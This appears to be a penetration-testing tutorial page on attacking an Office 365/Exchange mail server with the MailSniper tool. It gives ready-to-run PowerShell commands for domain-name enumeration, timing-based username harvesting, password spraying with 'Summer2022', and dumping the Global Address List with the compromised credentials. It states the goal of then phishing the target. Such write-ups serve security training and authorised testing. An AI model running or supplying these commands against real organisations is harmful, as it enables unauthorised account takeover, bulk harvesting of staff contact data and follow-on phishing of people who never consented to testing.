Attacking Office 365 & Exchange

In this Case scenario i have a subdomain that is mail.redacted.io, i will now password spray against this domain so that i can phish the target, for this i will use MailSniper

GitHub - dafthack/MailSniper: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.GitHub

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

Invoke-DomainHarvestOWA -ExchHostname mail.redacted.io

now we need to find the valid usernames so we can do username enumeration, you can find it by alot of methods like public website or hunter.io, now we will start our attack on the mail subdomain, Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid.

Invoke-UsernameHarvestOWA -ExchHostname mail.redacted.io -Domain redacted.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt

we have found 3 valid usernames now we will try to password spray as well using mailsniper and we will use the password of Summer2022 just to test because alot of organizations are using the default password

Invoke-PasswordSprayOWA -ExchHostname mail.redacted.io -UserList .\Desktop\valid.txt -Password Summer2022

now we have the valid username and password so we need to enumerate some more information from these valid credentials

so we will try to download the GAL list which is GLOABL ADDRESS LIST that contains the list of emails and some other potential data

Get-GlobalAddressList -ExchHostname mail.redacted.io -UserName redacted.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt

PreviousEmail Spoofing NextEnumeration

Last updated 1 year ago